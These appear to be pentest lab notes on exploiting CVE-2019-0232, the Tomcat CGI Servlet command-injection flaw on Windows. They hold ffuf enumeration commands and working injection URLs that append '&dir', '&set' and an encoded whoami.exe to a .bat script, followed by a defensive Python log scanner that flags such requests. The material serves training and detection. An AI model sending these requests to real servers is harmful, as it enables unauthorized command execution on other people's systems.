Attacking Tomcat CGI

  • https://github.com/setrus/CVE-2019-0232
    • Affects Windows systems that have the enableCmdLineArguments feature enabled.
    • Attackers exploit a command injection flaw caused by a Tomcat CGI Servlet input validation error, which allows them to execute arbitrary commands on the affected system.
    • Tomcat versions 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 are affected.
  • The CGI Servlet is a vital component of Apache Tomcat that enables web servers to communicate with external applications beyond the Tomcat JVM.
    • These external applications are typically CGI scripts written in languages like Perl, Python, or Bash.
    • The CGI Servlet receives requests from web browsers and forwards them to CGI scripts for processing.
    • Web server (Apache Tomcat) -> CGI Servlet -> CGI script (processing) -> response

Issue:

  • If enableCmdLineArguments is set to true, the CGI Servlet parses the query string and passes it to the CGI script as command-line arguments.
    • This feature can make CGI scripts more flexible and easier to write, since parameters can be passed to the script without using environment variables or standard input.
    • A CGI script can use command-line arguments to switch between actions based on user input.
  • EX: Suppose you have a CGI script that allows users to search for books in a bookstore's catalogue. The script has two possible actions: "search by title" and "search by author."
  • http://example.com/cgi-bin/booksearch.cgi?action=title&query=the+great+gatsby
  • http://example.com/cgi-bin/booksearch.cgi?action=author&query=fitzgerald
  • Using command-line arguments in the CGI script makes switching between the actions easy.

Enum:

  • Run nmap to find the Apache Tomcat server.
  • Find a CGI script using ffuf.
  • Since we are aiming to pwn Windows, fuzz for .cmd and .bat scripts:
  • for CMD
    • ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.cmd
  • for BAT
    • ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat
  • Navigate to the CGI script that was found to check it.

Attack:

  • Exploit CVE-2019-0232 - https://github.com/setrus/CVE-2019-0232
  • It allows appending our own commands using the batch command separator &.
  • http://10.129.204.227:8080/cgi/welcome.bat?&dir
  • http://10.129.204.227:8080/cgi/welcome.bat?&set
    • Lets you see the environment variables.
    • We can see that C:\Windows\system32\cmd.exe is set, so other binaries like whoami.exe should be in the same directory.
  • http://10.129.204.227:8080/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe
    • URL-encoded payload.
    • Spaces must be sent as +.
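Detection side of the requests above, as an added example that is not part of the original notes or the linked PoC: it rebuilds the CGI Servlet's argument rule (a query string with no '=' is split on '+' and each piece URL-decoded into argv) and scans Tomcat access-log lines in the default "common" pattern for CGI-script requests whose decoded arguments fall outside a conservative allow-list (letters, digits, `-._`; the allow-list and the /cgi/ mapping are assumptions, and the log lines are constructed).

```python
import re
from urllib.parse import unquote, urlsplit

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumption: Windows scripts are served under the /cgi/ mapping used above
CGI_SCRIPT_RE = re.compile(r'^/cgi/.*\.(?:bat|cmd)$', re.IGNORECASE)
# Assumed allow-list for one decoded argument; '&', '\', ':' etc. fall outside it
SAFE_ARG_RE = re.compile(r'^[A-Za-z0-9._-]+$')

def cmdline_args(target):
    """Reproduce how a query string without '=' becomes CGI argv:
    split on '+', then URL-decode each piece (hence 'spaces must be +')."""
    query = urlsplit(target).query
    if not query or '=' in query:
        return []  # name=value queries stay in QUERY_STRING, not argv
    return [unquote(piece) for piece in query.split('+')]

def suspicious_args(target):
    """Decoded arguments that carry anything outside the allow-list,
    e.g. a leading '&' that cmd.exe treats as a command separator."""
    if not CGI_SCRIPT_RE.match(urlsplit(target).path):
        return []
    return [a for a in cmdline_args(target) if a and not SAFE_ARG_RE.match(a)]

def scan_access_log(lines):
    """Return (ip, target, bad_args) for every request worth investigating."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (bad := suspicious_args(m['target'])):
            hits.append((m['ip'], m['target'], bad))
    return hits

# Constructed sample log lines (not real traffic) mirroring the requests above
SAMPLE_LOG = [
    '10.10.14.5 - - [12/Mar/2023:10:15:22 +0000] "GET /cgi/welcome.bat HTTP/1.1" 200 512',
    '10.10.14.5 - - [12/Mar/2023:10:15:30 +0000] "GET /cgi/welcome.bat?&dir HTTP/1.1" 200 2048',
    '10.10.14.5 - - [12/Mar/2023:10:15:41 +0000] "GET /cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe HTTP/1.1" 200 64',
    '10.10.14.9 - - [12/Mar/2023:10:16:02 +0000] "GET /cgi/booksearch.cgi?action=title&query=gatsby HTTP/1.1" 200 300',
    '10.10.14.9 - - [12/Mar/2023:10:16:10 +0000] "GET /cgi/report.cmd?monthly+2023-03 HTTP/1.1" 200 300',
]

if __name__ == '__main__':
    for ip, target, bad in scan_access_log(SAMPLE_LOG):
        print(f'{ip} {target} -> argv {bad}')
```

Only the two `welcome.bat` requests with a leading `&` are reported; the `name=value` search and the plain `monthly+2023-03` arguments pass.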